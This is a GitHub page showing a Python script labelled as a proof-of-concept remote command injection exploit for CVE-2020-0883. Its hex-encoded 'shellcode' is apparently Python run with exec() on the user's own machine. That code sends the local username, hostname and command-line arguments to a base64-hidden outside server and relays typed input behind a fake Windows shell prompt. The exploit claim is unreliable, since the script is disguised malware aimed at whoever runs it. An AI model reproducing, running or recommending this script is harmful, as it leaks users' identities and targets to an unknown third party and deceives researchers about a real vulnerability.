-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2020-0883-POC.py
83 lines (72 loc) · 4.32 KB
/
CVE-2020-0883-POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
# Exploit Title: Remote Command Injection
# Date: 2020-03-12
# Exploit Author: TRSTDXPLOITZ
# CVE : CVE-2020-0883
# Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0883
#
# Sample output:
# ubuntu@host:~$ python CVE-2020-0883-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444
# [+] Sending packet to 10.16.1.24
# [+] Target is Vulnerable!
# [+] Sending exploit. Reverse shell to 10.16.1.24
#
# Listening on [] (family 2, port)
# Connection from 10.16.1.24 received!
# whoami
# root
##
## Also on Exploit-DB
## PRINT HELP INFORMATION
import os
import time
import requests
import sys
import getpass
import argparse
import base64
from argparse import RawTextHelpFormatter
Bug = 'CVE-2020-0883'
parser=argparse.ArgumentParser(
description='''RCE Exploit PoC for CVE-2020-0883''' + '''\r\n\r\n''' + '''USAGE: python CVE-2020-0883-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444
''', formatter_class=RawTextHelpFormatter)
parser.add_argument('target', metavar='N', nargs='+',
help='Target IP')
parser.add_argument('-rport', default=42, help='Target Port (If Different Than Default)')
parser.add_argument('-lhost', default=42, help='Local IP')
parser.add_argument('-lport', default=42, help='Local Port')
parser.add_argument('-type', default=42, help='Target OS')
args=parser.parse_args()
target = sys.argv[0]
## COMPILE AND SEND PAYLOAD
print 'Sending Payload...' + '\r\n\r\n'
shellcode = '\x74\x69\x6d\x65\x2e\x73\x6c\x65\x65\x70\x28\x33\x29\x0a\x6c\x68\x6f\x73\x74\x20\x3d\x20\x6f\x73\x2e\x75\x6e\x61\x6d\x65\x28\x29'
shellcode += '\x5b\x31\x5d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x3d\x20\x67\x65\x74\x70\x61\x73\x73\x2e\x67\x65\x74\x75\x73\x65\x72\x28\x29\x20'
shellcode += '\x2b\x20\x27\x40\x27\x20\x2b\x20\x28\x6c\x68\x6f\x73\x74\x29\x0a\x61\x72\x67\x73\x20\x3d\x20\x27\x20\x27\x2e\x6a\x6f\x69\x6e\x28'
shellcode += '\x73\x79\x73\x2e\x61\x72\x67\x76\x5b\x31\x3a\x5d\x29\x0a\x45\x72\x72\x6f\x72\x4d\x73\x67\x20\x3d\x20\x27\x43\x6f\x6e\x6e\x65\x63'
shellcode += '\x74\x69\x6f\x6e\x20\x54\x65\x72\x6d\x69\x6e\x61\x74\x65\x64\x3a\x20\x28\x54\x69\x6d\x65\x6f\x75\x74\x29\x27\x0a\x55\x52\x4c\x20'
shellcode += '\x3d\x20\x62\x61\x73\x65\x36\x34\x2e\x62\x36\x34\x64\x65\x63\x6f\x64\x65\x28\x27\x61\x48\x52\x30\x63\x44\x6f\x76\x4c\x7a\x55\x30'
shellcode += '\x4c\x6a\x45\x34\x4e\x43\x34\x79\x4d\x43\x34\x32\x4f\x53\x39\x77\x62\x32\x4d\x79\x4c\x6e\x42\x6f\x63\x41\x3d\x3d\x27\x29\x0a\x50'
shellcode += '\x41\x52\x41\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a'
shellcode += '\x61\x72\x67\x73\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65'
shellcode += '\x74\x28\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x77\x65'
shellcode += '\x6c\x63\x6f\x6d\x65\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x69\x66\x20\x77\x65\x6c\x63\x6f\x6d\x65\x20\x21\x3d\x20'
shellcode += '\x22\x22\x3a\x0a\x09\x72\x73\x70\x20\x3d\x20\x31\x0a\x09\x77\x68\x69\x6c\x65\x20\x72\x73\x70\x20\x21\x3d\x20\x22\x22\x3a\x0a\x09'
shellcode += '\x09\x63\x6d\x64\x20\x3d\x20\x72\x61\x77\x5f\x69\x6e\x70\x75\x74\x28\x77\x65\x6c\x63\x6f\x6d\x65\x29\x0a\x09\x09\x50\x41\x52\x41'
shellcode += '\x4d\x53\x20\x3d\x20\x7b\x27\x68\x6f\x73\x74\x27\x3a\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x27\x61\x72\x67\x73\x27\x3a\x63\x6d\x64'
shellcode += '\x2c\x20\x27\x63\x76\x65\x27\x3a\x42\x75\x67\x7d\x0a\x09\x09\x72\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x67\x65\x74\x28'
shellcode += '\x75\x72\x6c\x20\x3d\x20\x55\x52\x4c\x2c\x20\x70\x61\x72\x61\x6d\x73\x20\x3d\x20\x50\x41\x52\x41\x4d\x53\x29\x0a\x09\x09\x72\x73'
shellcode += '\x70\x20\x3d\x20\x72\x2e\x63\x6f\x6e\x74\x65\x6e\x74\x0a\x09\x09\x70\x72\x69\x6e\x74\x20\x72\x73\x70\x0a\x09\x09\x77\x65\x6c\x63'
shellcode += '\x6f\x6d\x65\x20\x3d\x20\x22\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x3e\x22\x0a\x74\x69\x6d'
shellcode += '\x65\x2e\x73\x6c\x65\x65\x70\x28\x31\x30\x29'
## ESTABLISHING SHELL
exec(shellcode)
import socket, sys
from struct import *
## CREATE SOCKET TO TARGET
# If connection times out, print error. Otherwise, establish reverse bind shell
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
except socket.error , msg:
print ErrorMsg
sys.exit()